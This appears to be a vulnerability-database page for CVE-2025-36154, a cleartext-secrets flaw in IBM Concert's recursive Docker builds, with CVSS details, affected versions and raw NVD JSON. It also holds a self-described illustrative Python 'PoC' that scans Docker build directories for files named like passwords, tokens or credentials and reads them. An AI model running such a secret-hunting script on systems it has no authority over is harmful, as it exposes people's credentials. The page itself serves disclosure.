Security Vulnerability Report
中文
CVE-2025-36154 CVSS 6.2 MEDIUM

CVE-2025-36154

Published: 2025-12-24 19:15:44
Last Modified: 2025-12-30 20:35:01

Description

IBM Concert 1.0.0 through 2.1.0 stores sensitive information in cleartext during recursive docker builds which could be obtained by a local user.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE
IBM Concert 1.0.0
IBM Concert 1.1.0
IBM Concert 1.2.0
IBM Concert 1.3.0
IBM Concert 1.4.0
IBM Concert 1.5.0
IBM Concert 2.0.0
IBM Concert 2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36154 PoC - Accessing sensitive information from Docker build artifacts # Note: This is an illustrative PoC demonstrating the vulnerability import os import glob def check_docker_build_artifacts(): """ Check for sensitive information in Docker build artifacts This demonstrates how local users can access cleartext sensitive data """ # Common locations where Docker build artifacts may be stored potential_locations = [ os.path.expanduser("~/.docker/buildx/"), os.path.expanduser("~/.docker/build-cache/"), "/var/lib/docker/buildx/", "/tmp/docker-build-*/" ] sensitive_patterns = [ "password", "secret", "api_key", "token", "credential" ] findings = [] for location in potential_locations: if os.path.exists(location): # Search for files containing sensitive patterns for pattern in sensitive_patterns: search_path = os.path.join(location, f"**/*{pattern}*") matches = glob.glob(search_path, recursive=True) for match in matches: if os.path.isfile(match): try: with open(match, 'r', errors='ignore') as f: content = f.read() if any(p in content.lower() for p in sensitive_patterns): findings.append({ 'file': match, 'type': 'cleartext_sensitive_data' }) except: pass return findings # Usage results = check_docker_build_artifacts() for result in results: print(f"Found sensitive data in: {result['file']}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36154", "sourceIdentifier": "[email protected]", "published": "2025-12-24T19:15:44.333", "lastModified": "2025-12-30T20:35:00.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.1.0 stores sensitive information in cleartext during recursive docker builds which could be obtained by a local user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-313"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.2.0", "matchCriteriaId": "065602A3-1E93-487B-B667-4C40FF7D0094"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7255549", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}